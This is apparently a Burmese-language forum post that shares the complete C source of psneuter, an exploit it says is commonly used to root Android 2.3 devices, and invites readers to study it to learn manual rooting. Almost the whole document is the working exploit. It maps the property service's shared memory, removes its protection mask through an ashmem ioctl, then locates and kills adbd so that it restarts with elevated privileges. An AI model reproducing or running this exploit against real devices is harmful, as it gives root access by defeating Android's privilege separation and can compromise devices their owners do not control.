android 2.3 series ေတြကို root လုပ္တဲ့အခါမွာ သံုးေလ့ရွိတဲ့ exploit ဖိုင္တစ္ခုျဖစ္တဲ့ psneuter ရဲ႕ source code

android 2.3 series ေတြကို root လုပ္တဲ့အခါမွာ သံုးေလ့ရွိတဲ့ exploit ဖိုင္တစ္ခုျဖစ္တဲ့ psneuter ရဲ႕ source code ပါ... ဒီ source ကိုေလ့လာၾကည့္ရင္ manual root ကို ဘယ္လို လုပ္လို႔ရမယ္ဆိုတာ သိသြားပါလိမ့္မယ္... 2.3 ေတြအတြက္ဘဲဆိုေပမဲ့ သေဘာတရားျခင္းတူတဲ့အတြက္ေၾကာင့္မို႔... တစ္ခ်ဳိ႕ေသာ partition ေတြကို ျပင္ဆင္လိုက္တာနဲ႕ က်န္တဲ့ version ေတြကို ရသြားပါလိမ့္မယ္... တစ္ခုေတာ့ရွိတယ္... android kernel ရဲ႕ ဖြဲ႕စည္းပံုကိုေတာ့ မျဖစ္မေနသိထားဖို႔လိုပါတယ္... Google မွာ ရွာရင္ေတာ့ ရႏိုင္ပါတယ္... သို႔ေပမဲ့ အေတာ္ေလးစိတ္ရွည္မွျဖစ္လိမ့္မယ္... ဘာလို႔လည္းဆိုေတာ့... ကိုုယ္ရွာတာနဲ႕ မဆိုင္တာေတြ အမ်ားႀကီးေတြ႕တတ္တယ္... ေနာက္ၿပီး ေတြ႔ေတာ့လည္း ဘာမွန္းမသိတာေတြျဖစ္တတ္တယ္... code ေတြကို ေလ့လာၾကည့္ၾကပါ...
xxxxxxxxxxxxxxxxxxxxxxxxxxxxx
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/mman.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <linux/ioctl.h>
#include <signal.h>
#include <unistd.h>
#include <fcntl.h>
#include <dirent.h>
#include <stdint.h>
#define ASHMEM_NAME_LEN 256
#define __ASHMEMIOC 0x77
#define ASHMEM_SET_NAME _IOW(__ASHMEMIOC, 1, char[ASHMEM_NAME_LEN])
#define ASHMEM_GET_NAME _IOR(__ASHMEMIOC, 2, char[ASHMEM_NAME_LEN])
#define ASHMEM_SET_SIZE _IOW(__ASHMEMIOC, 3, size_t)
#define ASHMEM_GET_SIZE _IO(__ASHMEMIOC, 4)
#define ASHMEM_SET_PROT_MASK _IOW(__ASHMEMIOC, 5, unsigned long)
#define ASHMEM_GET_PROT_MASK _IO(__ASHMEMIOC, 6)
#define ASHMEM_PIN _IOW(__ASHMEMIOC, 7, struct ashmem_pin)
#define ASHMEM_UNPIN _IOW(__ASHMEMIOC, 8, struct ashmem_pin)
#define ASHMEM_GET_PIN_STATUS _IO(__ASHMEMIOC, 9)
#define ASHMEM_PURGE_ALL_CACHES _IO(__ASHMEMIOC, 10)
int main(int argc, char **argv, char **envp)
{
char *workspace;
char *fdStr;
char *szStr;
char *ppage;
int fd;
long sz;
DIR *dir;
struct dirent *dent;
char cmdlinefile[PATH_MAX];
char cmdline[PATH_MAX];
pid_t adbdpid = 0;
setvbuf(stdout, 0, _IONBF, 0);
setvbuf(stderr, 0, _IONBF, 0);
workspace = getenv("ANDROID_PROPERTY_WORKSPACE");
if(!workspace)
{
fprintf(stderr, "Couldn't get workspace.\n");
exit(1);
}
fdStr = workspace;
if(strstr(workspace, ","))
*(strstr(workspace, ",")) = 0;
else
{
fprintf(stderr, "Incorrect format of ANDROID_PROPERTY_WORKSPACE environment variable?\n");
exit(1);
}
szStr = fdStr + strlen(fdStr) + 1;
fd = atoi(fdStr);
sz = atol(szStr);
if((ppage = mmap(0, sz, PROT_READ, MAP_SHARED, fd, 0)) == MAP_FAILED)
{
fprintf(stderr, "mmap() failed. %s\n", strerror(errno));
exit(1);
}
if(ioctl(fd, ASHMEM_SET_PROT_MASK, 0))
{
fprintf(stderr, "Failed to set prot mask (%s)\n", strerror(errno));
exit(1);
}
printf("property service neutered.\n");
printf("killing adbd. (should restart in a second or two)\n");
// now kill adbd.
dir = opendir("/proc");
if(!dir)
{
fprintf(stderr, "Failed to open /proc? kill adbd manually... somehow\n");
exit(1);
}
while((dent = readdir(dir)))
{
if(strspn(dent->d_name, "0123456789") == strlen(dent->d_name))
{
// pid dir
strcpy(cmdlinefile, "/proc/");
strcat(cmdlinefile, dent->d_name);
strcat(cmdlinefile, "/cmdline");
if((fd = open(cmdlinefile, O_RDONLY)) < 0)
{
fprintf(stderr, "Failed to open cmdline for pid %s\n", dent->d_name);
continue;
}
if(read(fd, cmdline, PATH_MAX) < 0)
{
fprintf(stderr, "Failed to read cmdline for pid %s\n", dent->d_name);
close(fd);
continue;
}
close(fd);
// printf("cmdline: %s\n", cmdline);
if(!strcmp(cmdline, "/sbin/adbd"))
{
// we got it.
adbdpid = atoi(dent->d_name);
break;
}
}
}
if(!adbdpid)
{
fprintf(stderr, "Failed to find adbd pid :(\n");
exit(1);
}
if(kill(adbdpid, SIGTERM))
{
fprintf(stderr, "Failed to kill adbd (%s)\n", strerror(errno));
exit(1);
}
return 0;
}